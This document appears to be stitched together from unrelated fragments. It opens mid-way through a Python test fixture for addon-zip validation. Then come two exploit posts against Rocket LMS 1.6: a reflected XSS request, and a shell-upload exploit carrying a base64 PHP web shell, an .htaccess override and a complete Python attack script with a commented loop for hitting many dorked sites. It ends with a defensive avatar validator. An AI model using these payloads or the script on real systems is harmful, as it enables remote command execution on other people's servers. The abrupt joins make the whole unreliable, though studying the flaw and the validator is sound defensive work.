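# Benign addon: a stylesheet and a config.json that installs it under uploads/.
GOOD_ADDON = build_zip({
    "certificate/config.json": json.dumps([{
        "root_directory": "uploads/addons/certificate/others/style.css",
        "update_directory": "uploads/certificates/style.css"}]),
    "certificate/others/style.css": "body { margin: 0 }",
})
# The pattern from the write-up, with placeholder contents: a PHP file under
# others/ mapped to a web-reachable path, plus a path-traversal entry.
BAD_ADDON = build_zip({
    "certificate/config.json": json.dumps([{
        "root_directory": "uploads/addons/certificate/others/shell.php",
        "update_directory": "uploads/certificates/shell.php"}]),
    "certificate/others/shell.php": "placeholder",
    "../../index.php": "placeholder",
})
```

Run validate_addon on the uploaded bytes before move_uploaded_file and refuse the upload when the returned list is non-empty.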
<pre><code># Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Version: Version 1.6<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request-----------<br />GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3D<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: Rocket LMS - Learning Management System Shell Upload<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Version: Version 1.6<br /># Tested on Ubuntu 18.04<br /><br />Base64-encode your payload.<br />After "data:image/", write your extension.<br />Upload.<br />-----<br />There is an .htaccess restriction on the Rocket LMS public folder; upload your own .htaccess to the avatar folder first.<br /><br />Enjoy!<br /><br /><br />-------Request-----------<br />POST /panel/setting HTTP/1.1<br />Host: localhost<br />Content-Length: 214<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/panel/setting/step/2<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D<br />Connection: close<br /><br />_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==<br />&cover_img=%2Fstore%2F995%2F7.jpg<br /><br /><br /><br />Exploit:<br /><br /><br />import time<br />import requests<br />import base64<br />import re<br /><br />import traceback<br />class Rocket:<br />    def __init__(self,ssl,host,port,email,password,file):<br />        self._url_to_upload = "/panel/setting"<br />        self._url_to_login = "/login"<br />        self.host = host<br />        self.port = port<br />        self.ssl = ssl<br />        self.email = email<br />        self.password = password<br />        self.file = file<br />    def get_csrf_token(self,client,URL):<br /><br />        fromt = client.get(URL)<br /><br />        if 'XSRF-TOKEN' in client.cookies:<br /><br />            csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]<br /><br />            return csrftoken<br /><br />        else:<br /><br />            print("Error while fetching token")<br />            return<br /><br />    def login(self):<br />        client = requests.session()<br /><br /><br />        if self.ssl == True:<br />            ssl= "https://"<br />        else:<br />            ssl= "http://"<br />        URL = str(ssl+self.host+":"+self.port+self._url_to_login)<br />        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)<br />        csrftoken = self.get_csrf_token(client,URL)<br />        fromt = client.get(URL) # sets cookie<br /><br />        login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')<br />        r = client.post(URL, data=login_data, cookies=client.cookies)<br /><br /><br />        self.upload_shell(client,URL2)<br />        self.upload_htaccess(client,URL2)<br />    def upload_shell(self,client,URL):<br />        csrftoken = self.get_csrf_token(client,URL)<br />        with open(self.file,"r") as payload:<br />            to_base64 = payload.read()<br /><br />        to_base64 = str(to_base64).encode("utf-8")<br />        base64_encoded_data= base64.b64encode(to_base64)<br />        base64_encoded_data = str(base64_encoded_data)[:-1]<br />        base64_encoded_data = str(base64_encoded_data)[2:]<br /><br />        string = "data:image/php;base64,"+str(base64_encoded_data)<br />        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")<br />        r = client.post(URL, data=data, cookies=client.cookies)<br />        print(r.status_code)<br />        if r.status_code == 200:<br />            print("sent and uploaded shell :"+URL+"\n")<br /><br />        else:<br />            print("couldn't upload shell")<br /><br /><br />    def upload_htaccess(self,client,URL):<br />        csrftoken = self.get_csrf_token(client,URL)<br /><br />        string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="<br />        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")<br />        r = client.post(URL, data=data, cookies=client.cookies)<br />        print(r.status_code)<br />        if r.status_code == 200:<br />            print("sent and uploaded htaccess:"+URL+"\n")<br />            print("Go and rename file in filemanager on website")<br />        else:<br />            print("couldn't upload htaccess")<br /><br /><br /><br />elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")<br />elon.login()<br /><br /><br /><br /><br />#with dork<br /># try:<br />#     with open("sites.txt","r") as urls:<br />#         url = urls.readlines()<br />#         ssl = True<br />#         port = 443<br />#         for line in url:<br /><br />#             try:<br />#                 if "sslyok" in line:<br />#                     port = 80<br />#                     ssl = False<br />#                 line = str(line.rstrip('%0a'))<br /><br />#                 print("trying:"+line)<br />#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")<br />#                 elon.login()<br />#                 time.sleep(1)<br />#             except Exception:<br />#                 #traceback.print_exc()<br />#                 print("atamadim")<br /><br />#             finally:<br />#                 print("okey")<br /># except Exception:<br />#     print("atamadim")<br /><br /><br /></code></pre>
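Server-side handling of the profile_image data URI, as an added Python illustration of the control the upload above bypasses. This is not Rocket LMS's (PHP) code; the accepted types, the size limit and the magic-byte table are assumptions, and the sample inputs are constructed with placeholder bodies.

```python
import base64
import binascii
import re
import secrets

# Avatar types the server accepts and the extension it assigns. The extension
# comes from this table, never from the client-supplied subtype, which is what
# let "image/php" and "image/.htaccess" turn into file names in the write-up.
ALLOWED = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}
# Leading bytes each type must start with; a mismatch means the declared
# type is not what the bytes are, and the upload is refused.
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n",
         "image/jpeg": b"\xff\xd8\xff",
         "image/gif": b"GIF8"}
MAX_BYTES = 2 * 1024 * 1024
DATA_URI_RE = re.compile(r"^data:(?P<mime>[^;,]+);base64,(?P<payload>.*)$", re.S)


class UploadRejected(ValueError):
    pass


def parse_avatar(data_uri, max_bytes=MAX_BYTES):
    """Validate a data: URI submitted as profile_image and return
    (extension, image bytes). Raises UploadRejected for anything else."""
    m = DATA_URI_RE.match(data_uri.strip())
    if not m:
        raise UploadRejected("not a base64 data URI")
    mime = m.group("mime").strip().lower()
    if mime not in ALLOWED:
        raise UploadRejected("type not allowed: %s" % mime)
    payload = re.sub(r"\s+", "", m.group("payload"))
    # Size check on the encoded form, before spending memory on decoding.
    if len(payload) > max_bytes * 4 // 3 + 4:
        raise UploadRejected("too large")
    try:
        raw = base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise UploadRejected("bad base64: %s" % exc)
    if not raw.startswith(MAGIC[mime]):
        raise UploadRejected("content is not %s" % mime)
    return ALLOWED[mime], raw


def stored_name(ext):
    """Random server-chosen file name; the client never influences it."""
    return secrets.token_hex(16) + ext


def rejects(data_uri):
    """True if parse_avatar refuses the input."""
    try:
        parse_avatar(data_uri)
    except UploadRejected:
        return True
    return False


def as_data_uri(mime, raw):
    return "data:%s;base64,%s" % (mime, base64.b64encode(raw).decode("ascii"))


# Constructed inputs: a minimal PNG header, and the two misuse patterns from
# the write-up with placeholder bodies instead of the original payloads.
PNG_URI = as_data_uri("image/png", MAGIC["image/png"] + b"\x00" * 16)
PHP_URI = as_data_uri("image/PHP", b"placeholder")
HTACCESS_URI = as_data_uri("image/.htaccess", b"placeholder")
MISMATCH_URI = as_data_uri("image/png", b"placeholder")  # declared PNG, is not

if __name__ == "__main__":
    ext, raw = parse_avatar(PNG_URI)
    print("accepted as", stored_name(ext), "with", len(raw), "bytes")
    for uri in (PHP_URI, HTACCESS_URI, MISMATCH_URI):
        print("rejected:", rejects(uri))
```

Serving the avatar directory with script execution disabled at the web-server level is the other half of the fix; a per-directory .htaccess like the one uploaded above only has effect where overrides are honoured.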